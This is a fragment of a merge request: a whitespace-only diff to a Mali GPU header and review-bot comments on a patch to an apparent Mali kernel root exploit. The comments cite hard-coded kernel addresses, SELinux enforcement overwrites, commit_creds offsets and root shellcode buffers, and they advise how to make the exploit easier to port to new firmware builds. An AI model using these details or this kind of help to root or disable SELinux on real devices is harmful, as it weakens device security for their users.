https://gitlab.freedesktop.org/panfrost/pandecode-standalone #include #include 
@@ -41,7 +41,7 @@ __gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) { uint64_t val = 0; const int width = end - start + 1; - const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1); for (int byte = start / 8; byte <= end / 8; byte++) { val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); @@ -64,13 +64,13 @@ enum mali_job_type { }; enum mali_write_value_type { - MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, - MALI_WRITE_VALUE_TYPE_ZERO = 3, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, }; @@ -240,7 +240,7 @@ struct mali_write_value_job_packed { uint32_t opaque[14]; }; -#define MALI_JOB_HEADER_header \ +#define MALI_JOB_HEADER_header \ .is_64b = true #define MALI_WRITE_VALUE_JOB_LENGTH 56
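Review bot: The `/* if (1) { ... } */` block left at the end of the fingerprint chain in `mali_shrinker_mmap32.c` is dead code carrying hard-coded addresses (`0x12253F0`, `0x5B328`, `0x910FC000`) and stale `avc_deny` comments; delete it instead of commenting it out, since git history preserves it and the `_neo` constants it references are otherwise unused. The eight live `benesse/...` and `Panasonic/...` branches are identical apart from the suffix; a table of `{fingerprint, selinux_enforcing, sel_read_handle_unknown, init_cred, commit_creds, add_init, add_commit}` walked in a loop would replace about fifty lines and turn support for the next firmware build into a single table row.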
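Review bot: In the `write_selinux` hunk the comment `//Go through the reserve pages addresses to write to avc_denied with our own shellcode` no longer describes the call beneath it, which writes to `selinux_enforcing` with `MALI_WRITE_VALUE_TYPE_IMMEDIATE_32`; update the comment. The `usleep(100000)` to `usleep(300000)` change is an unexplained magic number: give it a name beside the other timing constants and say in the commit message why 300 ms was needed on these devices, because a timing-dependent sleep is the first thing the next porter will have to retune.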
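Review bot: The `write_shellcode` hunk adds four commented-out alternatives (`sel_read_enforce_addr`, `sel_write_enforce_addr`, and the two `write_func(... root_code ...)` calls on `selinux_enforcing_READ`/`WRITE`) plus a commented `printf` that references `avc_deny_addr`, a variable that is itself inside the `/* ... */` block above; drop all of them. Separately, the live `write_func` call now emits `root_code_un`, while every live fingerprint branch calls `fixup_root_shell(...)` and `fixup_root_shell_un(...)` survives only inside the commented block; confirm that `fixup_root_shell` patches `root_code_un` (or rename consistently), since otherwise the per-build constants are applied to a buffer that is never written. The new `usleep(100000)` between the page-table write and `write_func` needs the same naming and rationale as the one in `write_selinux`.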
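Review bot: The `@@ -973,7 +887,7 @@` hunk in `trigger()` changes only whitespace on the `jit_allocate(...)` line; move whitespace-only edits into a separate formatting commit so the functional diff for Neo/Next support stays reviewable.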
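Review bot: In the `@@ -995,7 +909,7 @@` hunk, `printf("reserve pages here\n")` replaces a blank line and reads as a debugging trace; the surrounding code reports progress through `LOG(...)` (see `LOG("jit_freed\n")` two lines below), so either switch it to `LOG` or remove it.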
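Review bot: In the `@@ -1009,8 +923,13 @@` hunk, `run_enforce()` and the new `run_enforce_un()` are both called unconditionally with `//run_enforce_write();` left commented beside them; add a comment stating which of the two is expected to take effect on the supported builds, or select one based on the matched fingerprint, and delete the dead call. `printf("time to run_enforce\n")` is debug output that should go through `LOG` like the rest of `trigger()`, and the two added `usleep(100000)` calls are further unnamed timing constants.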
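Review bot: Every hunk in `midgard.h` (the `//` comment spacing, the `mask` parenthesis spacing, the `enum mali_write_value_type` column alignment, and the `MALI_JOB_HEADER_header` backslash alignment) is whitespace-only; the header states it was generated by pandecode-standalone, so hand-reformatting will be lost on the next regeneration and adds eighteen lines of noise to a functional patch. Drop these changes from the commit.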